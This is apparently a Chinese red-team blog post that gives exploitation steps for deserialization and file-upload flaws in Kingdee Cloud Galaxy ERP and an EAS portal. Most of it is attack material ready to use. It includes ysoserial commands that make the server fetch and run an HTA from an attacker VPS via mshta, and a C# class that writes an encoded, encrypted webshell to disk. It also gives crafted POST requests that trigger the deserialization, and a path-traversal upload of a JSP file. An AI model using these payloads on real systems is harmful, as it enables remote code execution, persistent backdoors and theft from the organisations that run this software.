很详细的文章,比较靠谱
1.漏洞版本
金蝶云星空<6.2.1012.4
7.0.352.16 < 金蝶云星空 <7.7.0.202111
8.0.0.202205 <金蝶云星空< 8.1.0.20221110
2.漏洞利用
2.1 文件上传
找到网站路径
http://IP/K3cloud/Kingdee.K3.SCM.App.CP.ServicePlugIn.WebAPI.GetCustomBussinessService.GetYZMByMobileNo,Kingdee.K3.SCM.App.CP.ServicePlugIn.common.kdsvc
建立payload.hta
<HTML>
<meta http-equiv="Contenti-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
set fso=createobject("scripting.filesystemobject")
set file=fso.createtextfile("D:\Kingdee\K3Cloud\WebSite\40261312.txt")
s="asdf123123"
file.write s
file.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
最后
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "mshta http://vps地址/payload.hta"
内存马
using System;
using System.IO;
class E
{
public E()
{
System.Web.HttpContext context = System.Web.HttpContext.Current;
context.Server.ClearError();
context.Response.Clear();
try
{
string baseDirectory = AppDomain.CurrentDomain.BaseDirectory;
string filePath = Path.Combine(baseDirectory, "service1.asmx");
string content = "PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iV2ViU2VydmljZTEiICU+CnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSA6IFN5c3RlbS5XZWIuU2VydmljZXMuV2ViU2VydmljZQp7CgogICAgICAgIFtTeXN0ZW0uV2ViLlNlcnZpY2VzLldlYk1ldGhvZChFbmFibGVTZXNzaW9uID0gdHJ1ZSldCiAgICAgICAgcHVibGljIHN0cmluZyBwYXNzMTIzNChzdHJpbmcgcGFzczEyMzQpCiAgICAgICAgewoJCQlTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyIHN0cmluZ0J1aWxkZXIgPSBuZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigpOwogICAgICAgICAgICB0cnkgeyBzdHJpbmcga2V5ID0gIjNjNmUwYjhhOWMxNTIyNGEiOyBzdHJpbmcgcGFzczEyMzRfcGFzcyA9ICJwYXNzMTIzNCI7IHN0cmluZyBtZDUgPSBTeXN0ZW0uQml0Q29udmVydGVyLlRvU3RyaW5nKG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Lk1ENUNyeXB0b1NlcnZpY2VQcm92aWRlcigpLkNvbXB1dGVIYXNoKFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMocGFzczEyMzRfcGFzcyArIGtleSkpKS5SZXBsYWNlKCItIiwgIiIpOyBieXRlW10gZGF0YSA9IFN5c3RlbS5Db252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoU3lzdGVtLldlYi5IdHRwVXRpbGl0eS5VcmxEZWNvZGUocGFzczEyMzQpKTsgZGF0YSA9IG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZCgpLkNyZWF0ZURlY3J5cHRvcihTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKGtleSksIFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoa2V5KSkuVHJhbnNmb3JtRmluYWxCbG9jayhkYXRhLCAwLCBkYXRhLkxlbmd0aCk7IGlmIChDb250ZXh0LlNlc3Npb25bInBheWxvYWQiXSA9PSBudWxsKSB7IENvbnRleHQuU2Vzc2lvblsicGF5bG9hZCJdID0gKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KXR5cGVvZihTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSkuR2V0TWV0aG9kKCJMb2FkIiwgbmV3IFN5c3RlbS5UeXBlW10geyB0eXBlb2YoYnl0ZVtdKSB9KS5JbnZva2UobnVsbCwgbmV3IG9iamVjdFtdIHsgZGF0YSB9KTsgOyB9IGVsc2UgeyBvYmplY3QgbyA9ICgoU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkpQ29udGV4dC5TZXNzaW9uWyJwYXlsb2FkIl0pLkNyZWF0ZUluc3RhbmNlKCJMWSIpOyBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtIG91dFN0cmVhbSA9IG5ldyBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCk7IG8uRXF1YWxzKENvbnRleHQpOyBvLkVxdWFscyhvdXRTdHJlYW0pOyBvLkVxdWFscyhkYXRhKTsgby5Ub1N0cmluZygpOyBieXRlW10gciA9IG91dFN0cmVhbS5Ub0FycmF5KCk7IHN0cmluZ0J1aWxkZXIuQXBwZW5kKG1kNS5TdWJzdHJpbmcoMCwgMTYpKTsgc3RyaW5nQnVpbGRlci5BcHBlbmQoU3lzdGVtLkNvbnZlcnQuVG9CYXNlNjRTdHJpbmcobmV3IFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUmlqbmRhZWxNYW5hZ2VkKCkuQ3JlYXRlRW5jcnlwdG9yKFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoa2V5KSwgU3lzdGVtLlRleHQuRW5jb2RpbmcuRGVmYXVsdC5HZXRCeXRlcyhrZXkpKS5UcmFuc2Zvcm1GaW5hbEJsb2NrKHIsIDAsIHIuTGVuZ3RoKSkpOyBzdHJpbmdCdWlsZGVyLkFwcGVuZChtZDUuU3Vic3RyaW5nKDE2KSk7IH0gfSBjYXRjaCAoU3lzdGVtLkV4Y2VwdGlvbikgeyB9CgkJCXJldHVybiBzdHJpbmdCdWlsZGVyLlRvU3RyaW5nKCk7CgkJfQogICAgCn0K";
byte[] decodedBytes = Convert.FromBase64String(content);
File.WriteAllBytes(filePath, decodedBytes);
context.Response.Write(filePath+"write success");
}
catch (System.Exception) { }
context.Response.Flush();
context.Response.End();
}
}
生成反序列化数据
ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;System.Windows.Forms.dll;System.dll;System.Web.dll"
利用点
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5520.225 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: ASP.NET_SessionId=41t5f11hkfhru5h5bc5wox3p; Theme=standard; kdservice-sessionid=13390743-9d17-4d4f-a6a9-a58582831195
cmd: whoami
Content-Type: text/json
Content-Length: 15907
{"ap0":"xxx","format":"3"}
还有个接口
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc HTTP/1.1
除了反序列化外,还有这个
文件上传
POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Length: 205
------WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Disposition: form-data; name="myFile"; filename="test.jsp"
Content-Type: text/html
<%out.println("test");%>
------WebKitFormBoundarySq4lDnabv8CwHfvx--
最后的路径是
http://127.0.0.1/easportal/buffalo/../test.jsp
JNDI
https://www.redteam.wang